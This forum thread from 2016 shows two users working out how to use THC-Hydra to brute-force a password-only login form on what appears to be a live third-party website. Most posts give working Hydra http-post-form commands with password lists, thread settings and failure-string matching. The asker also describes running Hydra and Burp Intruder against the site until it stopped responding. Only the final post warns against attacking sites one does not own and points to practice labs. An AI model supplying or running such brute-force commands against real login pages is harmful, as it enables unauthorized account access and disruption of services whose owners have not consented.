THC-Hydra with password only login form

[refr3sh]

Hello,

 

I’m trying to get THC-Hydra working on a website form which doesn’t require a username but hydra wants me to specify it with either –l, –L or -C.

The form field in question needs the following parameters, as far as I’ve found out using Burp Suite Free Edition:  password=test&do_login=yes&Submit=Log+in

I’m also not sure what service to use and what success or failure message the server sends (Burp Suite doesn't show it and the website doesn't display any message - it just refreshes and shows the same page), currently I’ve tried http-form-post with the following parameters hydra –t 5 –L users.txt –f –x 2:6:a www.<url>.com http-form-post “/protected:password=^PASS^:S=success”

(Note that I’ve specified, with –L users.txt, a username file but this is not required by the website’s form field)

The website’s form can be found under www.<url>.com/protected, how do I tell hydra to target the /protected page, and no only the www.<url>.com part?

 

What can I do?

 Any ideas?

[digip]

Try :

hydra -vv -L passwords.file -P '' www.<url>.com http-post-form "/protected:password=^USER^:do_login=yes:Submit=Log+In:F=success:"

If success is a valid response in the page, fine, but if not, replace with the error messge or whatever text says to do, such as :F=Login: which should not be there if successful. Also, set rate limit to 1 if you get too many false positives, which will be slower, but should work if every pass returns true.1

Edited December 2, 2016 by digip

[refr3sh]

Thank you! Attempts take place, -P '' doesn't work for me, it tells me that it can't file the specified file so I wrote -P passwords.txt instead. What do you mean by 

1 hour ago, digip said:

If success is a valid response in the page, fine, but if not, replace with the error messge or whatever text says to do, such as :F=Login: which should not be there if successful.

The HTML of the website defines a 

<p class="cc-protected-note">

<br/>

Password:

</p>

 

which is visible on the website.

 

So I would use:

hydra -V -f -l passwords.txt -P passwords.txt www.<url>.com http-post-form "/protected:password=^USER^:do_login=yes:Submit=Log+In:F=Password::"

 

(Note the double :: at the end of Password, I use it because the HTML contains it like this and also -P passwords.txt because it doesn't matter, right? ^PASS is not specified so -P isn't expanded, right?)

[digip]

You should be able to use -L '' -P passwords.txt with ^PASS^ instead of user then, but Hydra can use single logins, although usually used on things like vnc://x.x.x.x:5900 with the single login and no form needed, ie:

 

hydra -l '' -P /path/to/passwords.txt vnc://x.x.x.x:5900

 

That is how I've used it in the past which also works on things like telnet single logins to pass only a single input parameter, but I haven't tried on an http server with single sign in input. I'm assuming it should work the same, as I know hydra can do single input. You could alternatively also try ncrack which works much the same way, but check it's documentation for syntax since it's a different tool.

 

[digip]

Ok, so I had to go and test this to be sure, but yes, you CAN pass single field inputs and omit either login or pass with the 2 single quotes for an empty entry,and then omit the input from the form. I tested it with a simple PHP file just to verify with a hard coded field.

 

Example php file to HTTP POST against:

Login Now

<form action="" method="post">
<input type="text" name="pass" />
<input type="submit" />
</form>
<?php

if ( $_POST['pass'] !== "password123" ) {
	
	echo "Try Harder";

 } else {

	echo "w00t! You can haz 5,000 internets!";

}

?>

Then with hydra, you can test with your password list, put "password123" in the list anywhere, or use single -p vs -P file. example:

hydra -l '' -p password123 192.168.1.66 http-post-form "/pass.php:pass=^PASS^:F=Try Harder:"

where the :F=Fail: matches part of the error message returned by a POST request and returns true when it's not seen any longer(or at least that is my understanding of it)

If not using a single word and a password list:

hydra -l '' -P /root/passwords/500-worst-passwords.txt 192.168.1.66 http-post-form "/pass.php:pass=^PASS^:F=Try Harder:" -t16

Change -t16 to -t1 if you get too many false positives on the actual form you're testing against. 

 

Make sure you don't need to also pass cookies or session keys. You'll have to pass them in at the end like the :F= with the header :H cookie='foo=1' :" or such(look up the syntax, I'm going form memory here)

If you're brave, you can append a -d to the end of the commands, will turn debug on, and show you what is being posted and returned.

Edited December 3, 2016 by digip

[refr3sh]

So I haven't found out the server response so far - it seems to be pretty tricky to get it to output something - but I managed to get it working with your proposed parameters and providing -l with ''. For some reason, my both my KALI (in a VM) and Windows (natively) environments seem to crash after 16 attemtps... I've tried ncrack before but I didn't get it to work either, I'll have a look at now. Also tried Burp Suite, both Free and Pro version, but after some time the targeted server didn't show any response anymore although the Burp intruder kept trying

 

 

 

[refr3sh]

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Encoding: gzip
Content-Type: text/html; charset=UTF-8
Date: Sat, 03 Dec 2016 10:01:40 GMT
Server: nginx
Vary: Accept-Encoding
X-Jimdo-Instance: i-0a4ec76da6fce403c
X-Jimdo-Wid: s742dd563442b66d6
transfer-encoding: chunked
Connection: keep-alive

1354
        [{W H   OQQ <Dz  ? B  ! 
d  Ir8e l
$ FU x	h  ~   *I 
 Iw   c n  q [ }   ^ ?<    t m  x29"q? 9{Ù     0 

This is the raw server response when I enter a password. Unfortunately, the website seems to be built with Jimdo so I guess it's a lot harder to attack than a simple PHP-based form.

Thank you for your help!

[refr3sh]

Forget about the last post, i forgot to enable decompression. I've used various tools (Burp Suite, Fiddler) to intercept the traffic and all I get is the same page as before entering a password

[digip]

Don't attack live sites you don't own. Want to learn, download virtual machines from Vulnhub and practice on them, which a lot of them work with tools like Hydra to break into them and will show you more successful ways of doing thing. Most of them have walkthroughs, which help teach you the commands and give working examples for the CTF's

On topic, you can see and capture what is happing in a modern browser like Opera or Chrome using the console. Open a browser, and manually do the attempt while the JavaScript console is open, look on the network tab, and you should be able to see the request and response. In Opera, you can copy the request as a CURL statement, which will show the data posted. You may be leaving out something like hidden parameters or cookies.

Also, don't think compression is an issue, hydra should be able to work against gzip sites as well, but check the documentation to see if there is a setting for gzip.  Was the above output in the console from using the -d option for debug?